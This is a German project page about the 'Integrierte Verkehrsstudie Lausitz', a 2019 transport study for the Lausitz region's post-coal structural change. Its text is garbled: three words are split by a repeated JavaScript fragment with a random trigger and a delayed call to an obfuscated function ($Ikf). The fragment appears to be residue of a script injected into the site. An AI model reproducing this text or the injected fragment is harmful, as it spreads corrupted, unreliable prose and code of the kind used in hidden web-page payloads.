Hintergrundbild

Integrierte Verkehrsstudie Lausitz

April 2019:

Die Kommunen und Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andkreise der Region Lausitz stehen vor großen Herausforderungen durch den u. a. mit der Beendigung der Braunkohleförderung und -verstromung einhergehenden Strukturwandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel und die prognostizierte demografische Entwicklung. Die 2018 ins Leben gerufene Zukunftswerkstatt Lausitz soll zur Bewältigung dieser Herausforderungen neue Ideen und nachhaltige Perspektiven im Rahmen einer länderübergreifenden Regionalentwicklung erarbeiten.

Als eine wichtige Grundlage für das Projekt Zukunftswerkstatt Lausitz erarbeitet VKT gemeinsam mit einem Partnerbüro aus Potsdam die „Integrierte Verkehrsstudie Lausitz“, welche die ganzheitliche und integrierte Betrachtung der Verkehrsstrukturen in der Region im Fokus hat. Wesentliche Ziele sind hierbei die kritische Auseinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andersetzung mit der gegenwärtigen Situation und die darauf aufbauende Ableitung von infrastrukturellen, verkehrlichen und organisatorischen Maßnahmen zur Verbesserung der Wahrnehmung der Region als EINE zukunftsfähige Wirtschafts-, Wissenschafts- und Bildungs- sowie Tourismusregion.